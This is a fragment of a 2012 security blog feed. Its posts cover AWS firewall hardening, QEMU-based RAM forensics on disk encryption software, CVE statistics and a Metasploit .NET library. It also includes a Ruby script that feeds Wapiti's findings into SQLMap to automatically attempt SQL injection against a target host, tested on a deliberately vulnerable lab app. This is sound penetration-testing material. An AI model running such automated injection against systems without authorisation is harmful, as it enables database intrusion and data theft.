You may find the full code examples &lt;a href="https://gist.github.com/3710710"&gt;here&lt;/a&gt; and &lt;a href="https://gist.github.com/3710662"&gt;here&lt;/a&gt;.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/Nt5zOVCcaMU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/3723104738257873753/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/09/theoritical-vulnerabilities-using.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3723104738257873753?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3723104738257873753?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/Nt5zOVCcaMU/theoritical-vulnerabilities-using.html" title="Theoretical vulnerabilities using the Spring Expression Language" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/09/theoritical-vulnerabilities-using.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkEFQHkzfCp7ImA9WhJXEUQ.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-5236616805753735112</id><published>2012-08-05T14:30:00.000-06:00</published><updated>2012-08-05T14:30:11.784-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-08-05T14:30:11.784-06:00</app:edited><title>Security on the AWS cloud</title><content type="html">I have been working with EC2 
in my free time (what's that?) and realised some bad information had been spread about how to get your instances to talk with one another. By default, the instances do not respond to pings or nmap scans from other machines due to very restrictive firewall settings. This is a good thing. The bad thing was that I was reading on forums that setting your All ICMP, All UDP, and All TCP firewall settings to 0.0.0.0/0 was the easiest fix.

While it is true that this is the easiest fix, it isn't very secure. I was able to nmap a small subnet inside the EC2 cloud (the internal network, not the external one) and found 30 machines responding. When you put 0.0.0.0/0, you let everyone inside that network ping, port scan, and connect to your computer. By being more granular and restricting your firewall rules to the specific instances that you want talking (111.222.122.123/32), you protect your machine from threats inside the cloud network. Setting All ICMP, All UDP, and All TCP to 0.0.0.0/0 just opens you up needlessly to attack. It may take you an extra 5 minutes to create a rule for each host you want communicating.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/nZZ7OEaRSaI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/5236616805753735112/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/08/security-on-aws-cloud.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/5236616805753735112?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/5236616805753735112?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/nZZ7OEaRSaI/security-on-aws-cloud.html" title="Security on the AWS cloud" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" 
/></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/08/security-on-aws-cloud.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ck4GSX05fip7ImA9WhJRFU0.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-3602363509174815379</id><published>2012-07-16T22:55:00.001-06:00</published><updated>2012-07-16T22:55:28.326-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-07-16T22:55:28.326-06:00</app:edited><title>Performing forensics on RAMDisk based operating system via QEMU</title><content type="html">I came across a problem requiring me to get to a filesystem resident in RAM via a RAMDisk. I used QEMU to dump this to a file for further analysis.
&lt;br /&gt;&lt;br /&gt;
The system at hand was disk encryption software that performs some disk trickery to unlock the drive once credentials have been supplied to it. The disk encryption software was Linux based; however, the RAMDisk was being initialised by MS-DOS startup files. It was a very weird setup.
&lt;br /&gt;&lt;br /&gt;
I was able to use QEMU and an Ubuntu Live USB disk to dump what I needed. Because the disk encryption was resident on the HDD instead of the BIOS, I was able to boot to my Live USB and circumvent the HDD entirely. Once in the Live System, I installed qemu and ghex.
&lt;br /&gt;&lt;br /&gt;
Using 
&lt;br /&gt;&lt;pre&gt;
qemu-system-i386 -hda /dev/sda -monitor stdio
 &lt;/pre&gt;
I was able to boot the hard disk into a virtualised environment. The -monitor stdio option gives me a QEMU monitor prompt in the bash shell from which I started the QEMU instance; this is where we will be saving the full state of the VM. Once booted into the disk encryption software, I ran the following to see what block devices I had at my disposal:

&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;
(qemu) info block
ide0-hd0: removable=0 io-status=ok file=/dev/sda ro=0 drv=raw encrypted=0
ide1-cd0: removable=1 locked=0 tray-open=0 io-status=ok [not inserted]
floppy0: removable=1 locked=0 tray-open=0 [not inserted]
sd0: removable=1 locked=0 tray-open=0 [not inserted]
(qemu)
&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;

Now that I can see the block devices, ide0-hd0 is the one I want. The next step is to create a new file to save our VM into. snapshot_blkdev switches the guest's disk over to a new qcow2 overlay file named dump, backed by the original /dev/sda, so subsequent writes go to the overlay rather than the real disk; savevm needs a qcow2 image to hold its snapshot, which is why this step comes first:
&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;
snapshot_blkdev ide0-hd0 dump
&lt;/pre&gt;
&lt;br /&gt;&lt;br /&gt;
Now save the VM's state, including its memory (which is where the RAMDisk lives), into the dump file:
&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;
savevm
&lt;/pre&gt;
&lt;br /&gt;&lt;br /&gt;

You may now use further, more advanced techniques to analyse the contents of the RAM disk by using a hex editor or various other tools to extract the wanted data from the saved state of the vm.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/gSxg6hEk7Ew" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/3602363509174815379/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/07/performing-forensics-on-ramdisk-based.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3602363509174815379?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3602363509174815379?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/gSxg6hEk7Ew/performing-forensics-on-ramdisk-based.html" title="Performing forensics on RAMDisk based operating system via QEMU" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/07/performing-forensics-on-ramdisk-based.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CU8EQnw-cCp7ImA9WhVUFUg.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-1975542991373892242</id><published>2012-05-20T16:43:00.004-06:00</published><updated>2012-05-20T16:43:23.258-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-20T16:43:23.258-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" 
term="ruby" /><category scheme="http://www.blogger.com/atom/ns#" term="automation" /><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" term="wapiti" /><category scheme="http://www.blogger.com/atom/ns#" term="sqlmap" /><title>Automating SQLMap with data from wapiti</title><content type="html">Wapiti is really fast at finding possible SQL injection points in a web application or website, and SQLMap is great at figuring out how to exploit those possible injection points. The following script runs Wapiti against a host to find possible injection points, then passes that data to SQLMap to try to exploit them. Tested against BadStore, running the latest SVN checkouts of both Wapiti and SQLMap. You can play around with the arguments I am passing to SQLMap to make the scans a bit more thorough, at the expense of speed.

&lt;pre&gt;
#!/usr/bin/env ruby
# Run Wapiti against a host, pull the SQL injection findings out of its XML
# report and hand each one to SQLMap.

require 'securerandom'
require 'rexml/document'

wapiti_path = '/home/bperry/tools/wapiti/trunk/src/'
sqlmap_path = '/home/bperry/tools/sqlmap/'

# Wapiti marks the parameter it found injectable with this URL-encoded probe string
WAPITI_MARKER = "%BF%27%22%28"

remote_host = ARGV[0]
abort "usage: #{$0} http://host/" if remote_host.nil?

wapiti_report_path = '/tmp/wapiti_report_' + SecureRandom.uuid + '.xml'

puts "Running wapiti..."
`#{wapiti_path}wapiti.py #{remote_host} -f xml -o #{wapiti_report_path}`

puts "Report saved to #{wapiti_report_path}"
puts "Parsing results"

results = []

doc = ::File.open(wapiti_report_path, "rb") { |report| REXML::Document.new(report.read) }

doc.elements.each('/report/bugTypeList/bugType') do |element|
  bug_type = element.attributes["name"]
  next if bug_type != "SQL Injection"

  puts "Parsing " + bug_type

  element.elements.each("bugList/bug") do |bug|
    result = { :type => bug_type }
    bug.elements.each do |child|
      if child.name == "url"
        result[:url] = child.text
      elsif child.name == "parameter"
        result[:parameter] = child.text
      end
    end
    results &lt;&lt; result
  end
end

# Names of the parameters that do not carry the marker; SQLMap is told to skip
# them so it only tests the one Wapiti flagged
def params_without_marker(query)
  query.to_s.split("&amp;").reject { |param| param.index(WAPITI_MARKER) }.map { |param| param.split("=")[0] }
end

results.each do |result|
  puts "Running sqlmap"

  if result[:url].index(result[:parameter])
    # The marker sits in the URL itself, so this is a GET injection point
    url = result[:url].gsub(WAPITI_MARKER, "abcd")
    skipped_params = params_without_marker(result[:url].split("?")[1])

    puts "Running GET sql injection test on url: " + url
    sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --smart --skip=\"#{skipped_params.join(",")}\" --technique=EUS --flush-session --fresh-queries --level=2 --batch"
  else
    # Otherwise the marker is in the POST body that Wapiti reports as the parameter
    url = result[:url]
    puts "Running POST sql injection test on url: " + url
    puts "With data: " + result[:parameter]

    data = result[:parameter].gsub(WAPITI_MARKER, "abcd")
    skipped_params = params_without_marker(result[:parameter])

    sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --data=\"#{data}\" --skip=\"#{skipped_params.join(",")}\" --smart --technique=EUS --flush-session --fresh-queries --level=2 --batch"
  end

  puts sqlmap_command
  # print rather than printf: sqlmap output may contain % characters
  print `#{sqlmap_command}`
end
&lt;/pre&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/XeaUWyAwXDY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/1975542991373892242/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/05/automating-sqlmap-with-data-from-wapiti.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1975542991373892242?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1975542991373892242?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/XeaUWyAwXDY/automating-sqlmap-with-data-from-wapiti.html" title="Automating SQLMap with data from wapiti" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>4</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/05/automating-sqlmap-with-data-from-wapiti.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQHQ3o5fip7ImA9WhVVFEk.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-7844300915184767949</id><published>2012-05-07T20:15:00.002-06:00</published><updated>2012-05-07T20:32:12.426-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-07T20:32:12.426-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cve" /><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" term="mono" /><category scheme="http://www.blogger.com/atom/ns#" 
term="C#" /><title>Simple CVE stats from 2001-2011</title><content type="html">&lt;pre&gt;Year 2001 has 1538 vulnerabilities
2001 had 8 vulns of type:  Buffer Errors
2001 had 4 vulns of type:  Cryptographic Issues
2001 had 4 vulns of type:  Path Traversal
2001 had 2 vulns of type:  Authentication Issues
2001 had 2 vulns of type:  Permissions, Privileges, and Access Control
2001 had 2 vulns of type:  Code Injection
2001 had 2 vulns of type:  Input Validation
2001 had 1 vulns of type:  Resource Management Errors
2001 had 1 vulns of type:  Link Following
2001 had 0 vulns of type:  Credentials Management
2001 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2001 had 0 vulns of type:  Cross-Site Scripting
2001 had 0 vulns of type:  Format String Vulnerability
2001 had 0 vulns of type:  Configuration
2001 had 0 vulns of type:  Information Leak / Disclosure
2001 had 0 vulns of type:  Numeric Errors
2001 had 0 vulns of type:  OS Command Injections
2001 had 0 vulns of type:  Race Conditions
2001 had 0 vulns of type:  SQL Injection
Total vulns in 2001 with CWE: 26
Percentage of vulns with CWE: 1.69050715214564%


Year 2002 has 2368 vulnerabilities
2002 had 41 vulns of type:  Buffer Errors
2002 had 32 vulns of type:  Permissions, Privileges, and Access Control
2002 had 32 vulns of type:  Cross-Site Scripting
2002 had 29 vulns of type:  Input Validation
2002 had 17 vulns of type:  Information Leak / Disclosure
2002 had 13 vulns of type:  Path Traversal
2002 had 9 vulns of type:  Configuration
2002 had 8 vulns of type:  Credentials Management
2002 had 8 vulns of type:  Code Injection
2002 had 7 vulns of type:  SQL Injection
2002 had 6 vulns of type:  Numeric Errors
2002 had 6 vulns of type:  Resource Management Errors
2002 had 5 vulns of type:  Authentication Issues
2002 had 3 vulns of type:  Cryptographic Issues
2002 had 2 vulns of type:  Race Conditions
2002 had 2 vulns of type:  Link Following
2002 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2002 had 1 vulns of type:  Format String Vulnerability
2002 had 1 vulns of type:  OS Command Injections
Total vulns in 2002 with CWE: 223
Percentage of vulns with CWE: 9.41722972972973%


Year 2003 has 1515 vulnerabilities
2003 had 59 vulns of type:  Buffer Errors
2003 had 40 vulns of type:  Cross-Site Scripting
2003 had 30 vulns of type:  Input Validation
2003 had 25 vulns of type:  Information Leak / Disclosure
2003 had 24 vulns of type:  Permissions, Privileges, and Access Control
2003 had 17 vulns of type:  Path Traversal
2003 had 13 vulns of type:  Code Injection
2003 had 12 vulns of type:  Configuration
2003 had 12 vulns of type:  SQL Injection
2003 had 9 vulns of type:  Authentication Issues
2003 had 9 vulns of type:  Credentials Management
2003 had 8 vulns of type:  Cryptographic Issues
2003 had 6 vulns of type:  Resource Management Errors
2003 had 4 vulns of type:  Numeric Errors
2003 had 2 vulns of type:  Format String Vulnerability
2003 had 2 vulns of type:  Race Conditions
2003 had 2 vulns of type:  Link Following
2003 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2003 had 0 vulns of type:  OS Command Injections
Total vulns in 2003 with CWE: 274
Percentage of vulns with CWE: 18.0858085808581%


Year 2004 has 2669 vulnerabilities
2004 had 30 vulns of type:  Buffer Errors
2004 had 22 vulns of type:  Permissions, Privileges, and Access Control
2004 had 20 vulns of type:  Cross-Site Scripting
2004 had 9 vulns of type:  Path Traversal
2004 had 9 vulns of type:  Input Validation
2004 had 8 vulns of type:  SQL Injection
2004 had 6 vulns of type:  Authentication Issues
2004 had 6 vulns of type:  Credentials Management
2004 had 6 vulns of type:  Code Injection
2004 had 5 vulns of type:  Configuration
2004 had 4 vulns of type:  Information Leak / Disclosure
2004 had 4 vulns of type:  Resource Management Errors
2004 had 3 vulns of type:  Cryptographic Issues
2004 had 3 vulns of type:  Format String Vulnerability
2004 had 2 vulns of type:  Race Conditions
2004 had 2 vulns of type:  Link Following
2004 had 1 vulns of type:  Numeric Errors
2004 had 1 vulns of type:  OS Command Injections
2004 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
Total vulns in 2004 with CWE: 141
Percentage of vulns with CWE: 5.28287748220307%


Year 2005 has 4684 vulnerabilities
2005 had 64 vulns of type:  Buffer Errors
2005 had 48 vulns of type:  SQL Injection
2005 had 32 vulns of type:  Permissions, Privileges, and Access Control
2005 had 31 vulns of type:  Resource Management Errors
2005 had 28 vulns of type:  Cross-Site Scripting
2005 had 21 vulns of type:  Input Validation
2005 had 20 vulns of type:  Code Injection
2005 had 18 vulns of type:  Information Leak / Disclosure
2005 had 15 vulns of type:  Numeric Errors
2005 had 10 vulns of type:  Path Traversal
2005 had 5 vulns of type:  Link Following
2005 had 4 vulns of type:  Authentication Issues
2005 had 3 vulns of type:  Cryptographic Issues
2005 had 3 vulns of type:  Configuration
2005 had 2 vulns of type:  Credentials Management
2005 had 2 vulns of type:  Race Conditions
2005 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2005 had 1 vulns of type:  Format String Vulnerability
2005 had 1 vulns of type:  OS Command Injections
Total vulns in 2005 with CWE: 309
Percentage of vulns with CWE: 6.59692570452605%


Year 2006 has 7043 vulnerabilities
2006 had 199 vulns of type:  Code Injection
2006 had 145 vulns of type:  Buffer Errors
2006 had 87 vulns of type:  Cross-Site Scripting
2006 had 84 vulns of type:  SQL Injection
2006 had 74 vulns of type:  Resource Management Errors
2006 had 63 vulns of type:  Input Validation
2006 had 50 vulns of type:  Permissions, Privileges, and Access Control
2006 had 37 vulns of type:  Numeric Errors
2006 had 29 vulns of type:  Information Leak / Disclosure
2006 had 21 vulns of type:  Path Traversal
2006 had 17 vulns of type:  Format String Vulnerability
2006 had 14 vulns of type:  Authentication Issues
2006 had 8 vulns of type:  Cryptographic Issues
2006 had 7 vulns of type:  Race Conditions
2006 had 6 vulns of type:  Configuration
2006 had 5 vulns of type:  Credentials Management
2006 had 3 vulns of type:  Cross-Site Request Forgery (CSRF)
2006 had 2 vulns of type:  OS Command Injections
2006 had 1 vulns of type:  Link Following
Total vulns in 2006 with CWE: 852
Percentage of vulns with CWE: 12.0971177055232%


Year 2007 has 6505 vulnerabilities
2007 had 451 vulns of type:  Buffer Errors
2007 had 366 vulns of type:  Cross-Site Scripting
2007 had 296 vulns of type:  Code Injection
2007 had 263 vulns of type:  SQL Injection
2007 had 229 vulns of type:  Permissions, Privileges, and Access Control
2007 had 228 vulns of type:  Input Validation
2007 had 164 vulns of type:  Path Traversal
2007 had 107 vulns of type:  Numeric Errors
2007 had 104 vulns of type:  Resource Management Errors
2007 had 96 vulns of type:  Information Leak / Disclosure
2007 had 69 vulns of type:  Authentication Issues
2007 had 41 vulns of type:  Cross-Site Request Forgery (CSRF)
2007 had 36 vulns of type:  Configuration
2007 had 31 vulns of type:  Format String Vulnerability
2007 had 25 vulns of type:  Link Following
2007 had 24 vulns of type:  Credentials Management
2007 had 19 vulns of type:  Cryptographic Issues
2007 had 18 vulns of type:  Race Conditions
2007 had 6 vulns of type:  OS Command Injections
Total vulns in 2007 with CWE: 2573
Percentage of vulns with CWE: 39.554189085319%


Year 2008 has 7031 vulnerabilities
2008 had 1480 vulns of type:  SQL Injection
2008 had 981 vulns of type:  Cross-Site Scripting
2008 had 582 vulns of type:  Buffer Errors
2008 had 574 vulns of type:  Permissions, Privileges, and Access Control
2008 had 467 vulns of type:  Input Validation
2008 had 447 vulns of type:  Path Traversal
2008 had 385 vulns of type:  Code Injection
2008 had 322 vulns of type:  Resource Management Errors
2008 had 222 vulns of type:  Authentication Issues
2008 had 221 vulns of type:  Information Leak / Disclosure
2008 had 177 vulns of type:  Link Following
2008 had 166 vulns of type:  Numeric Errors
2008 had 119 vulns of type:  Cross-Site Request Forgery (CSRF)
2008 had 69 vulns of type:  Credentials Management
2008 had 61 vulns of type:  Cryptographic Issues
2008 had 41 vulns of type:  Configuration
2008 had 33 vulns of type:  Format String Vulnerability
2008 had 25 vulns of type:  Race Conditions
2008 had 12 vulns of type:  OS Command Injections
Total vulns in 2008 with CWE: 6384
Percentage of vulns with CWE: 90.797895036268%


Year 2009 has 4848 vulnerabilities
2009 had 734 vulns of type:  Cross-Site Scripting
2009 had 673 vulns of type:  SQL Injection
2009 had 558 vulns of type:  Buffer Errors
2009 had 329 vulns of type:  Permissions, Privileges, and Access Control
2009 had 266 vulns of type:  Code Injection
2009 had 247 vulns of type:  Input Validation
2009 had 245 vulns of type:  Path Traversal
2009 had 237 vulns of type:  Resource Management Errors
2009 had 164 vulns of type:  Numeric Errors
2009 had 148 vulns of type:  Authentication Issues
2009 had 141 vulns of type:  Information Leak / Disclosure
2009 had 86 vulns of type:  Cryptographic Issues
2009 had 84 vulns of type:  Cross-Site Request Forgery (CSRF)
2009 had 56 vulns of type:  Credentials Management
2009 had 47 vulns of type:  Configuration
2009 had 32 vulns of type:  Race Conditions
2009 had 29 vulns of type:  Link Following
2009 had 23 vulns of type:  Format String Vulnerability
2009 had 11 vulns of type:  OS Command Injections
Total vulns in 2009 with CWE: 4110
Percentage of vulns with CWE: 84.7772277227723%


Year 2010 has 4696 vulnerabilities
2010 had 578 vulns of type:  SQL Injection
2010 had 566 vulns of type:  Cross-Site Scripting
2010 had 536 vulns of type:  Buffer Errors
2010 had 319 vulns of type:  Permissions, Privileges, and Access Control
2010 had 299 vulns of type:  Input Validation
2010 had 270 vulns of type:  Resource Management Errors
2010 had 256 vulns of type:  Path Traversal
2010 had 248 vulns of type:  Code Injection
2010 had 162 vulns of type:  Information Leak / Disclosure
2010 had 154 vulns of type:  Numeric Errors
2010 had 66 vulns of type:  Cross-Site Request Forgery (CSRF)
2010 had 62 vulns of type:  Cryptographic Issues
2010 had 56 vulns of type:  Authentication Issues
2010 had 51 vulns of type:  Credentials Management
2010 had 33 vulns of type:  Race Conditions
2010 had 26 vulns of type:  Link Following
2010 had 21 vulns of type:  Configuration
2010 had 12 vulns of type:  Format String Vulnerability
2010 had 12 vulns of type:  OS Command Injections
Total vulns in 2010 with CWE: 3727
Percentage of vulns with CWE: 79.3654173764906%


Year 2011 has 3733 vulnerabilities
2011 had 648 vulns of type:  Buffer Errors
2011 had 372 vulns of type:  Input Validation
2011 had 367 vulns of type:  Cross-Site Scripting
2011 had 366 vulns of type:  Resource Management Errors
2011 had 295 vulns of type:  Information Leak / Disclosure
2011 had 285 vulns of type:  Permissions, Privileges, and Access Control
2011 had 120 vulns of type:  Numeric Errors
2011 had 107 vulns of type:  SQL Injection
2011 had 92 vulns of type:  Code Injection
2011 had 91 vulns of type:  Path Traversal
2011 had 60 vulns of type:  Authentication Issues
2011 had 57 vulns of type:  Cross-Site Request Forgery (CSRF)
2011 had 57 vulns of type:  Cryptographic Issues
2011 had 34 vulns of type:  Configuration
2011 had 32 vulns of type:  Credentials Management
2011 had 26 vulns of type:  Link Following
2011 had 14 vulns of type:  Race Conditions
2011 had 13 vulns of type:  OS Command Injections
2011 had 8 vulns of type:  Format String Vulnerability
Total vulns in 2011 with CWE: 3044
Percentage of vulns with CWE: 81.5429949102599%
Total: 49439
&lt;/pre&gt;

To be honest, I am a bit dismayed at the quality of the data. 2001 only categorized 1.7% of the vulns recorded (I am sure most, if not all, were added retroactively). The highest percentage of vulns that had been categorized was 90%, in 2008. I find it interesting that the first few years are dominated by buffer overflows (perhaps because of poor data), and then around 2008 web vulns become the top recorded and categorized type. Perhaps this is because of the vast amount of new web technologies emerging. That is, until 2011, when buffer overflows are once again the most common.

I used the xml files from the &lt;a href="http://nvd.nist.gov/download.cfm"&gt;NIST&lt;/a&gt; and my source code that I used to generate the stats is &lt;a href="https://github.com/brandonprry/CVE-stats"&gt;on github&lt;/a&gt;. Using LINQ, so it isn't super speedy. Takes a few minutes. Works with Mono or .NET.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/if-Fnf0HWcM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/7844300915184767949/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/05/simple-cve-stats-from-2001-20011.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/7844300915184767949?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/7844300915184767949?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/if-Fnf0HWcM/simple-cve-stats-from-2001-20011.html" title="Simple CVE stats from 2001-2011" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/05/simple-cve-stats-from-2001-20011.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C04CRnY7eip7ImA9WhVQEk4.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-1855761217710363225</id><published>2012-03-31T16:12:00.000-06:00</published><updated>2012-03-31T16:12:47.802-06:00</updated><app:edited 
xmlns:app="http://www.w3.org/2007/app">2012-03-31T16:12:47.802-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="nexpose" /><category scheme="http://www.blogger.com/atom/ns#" term=".net" /><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" term="mono" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><title>Communicating with your Metasploit server via Mono/.NET</title><content type="html">A few months ago, I released a &lt;a href="https://github.com/brandonprry/nexpose-sharp"&gt;library&lt;/a&gt; that helped integrate Nexpose into your .NET/Mono applications.

A few nights ago, I checked in my &lt;a href="https://github.com/brandonprry/metasploit-sharp"&gt;library&lt;/a&gt; that allows communication and integration with Metasploit from your .NET/Mono applications.
It is very much in beta, and I am not calling it feature complete. It works for the most part, but bugs will be found (and patches accepted!).

Take a look at the &lt;a href="https://github.com/brandonprry/metasploit-sharp/blob/master/Examples/Main.cs"&gt;Example&lt;/a&gt; I have to see it in action.

It follows the same Session/Manager pattern as the nexpose library does. No pro methods added yet, just core.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/0blKlQQd09M" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/1855761217710363225/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/03/communicating-with-your-metasploit.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1855761217710363225?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1855761217710363225?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/0blKlQQd09M/communicating-with-your-metasploit.html" title="Communicating with your Metasploit server via Mono/.NET" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/03/communicating-with-your-metasploit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEcCRnk6fSp7ImA9WhRbE04.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-969003547412524057</id><published>2012-02-03T22:39:00.006-06:00</published><updated>2012-02-03T23:07:47.715-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-03T23:07:47.715-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><title>What browsers support @import in their CSS?</title><content type="html">I 
prefer the following CSS:&lt;br /&gt;
&lt;pre&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style type="text/css"&amp;gt;
  @import url(/css/style.css);
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/pre&gt;&lt;br /&gt;
But not all browsers support @import. I wanted to see exactly which ones didn't, so I used browsershots.org with a simple &lt;a href="http://www.volatileminds.net/import_test.html"&gt;test&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
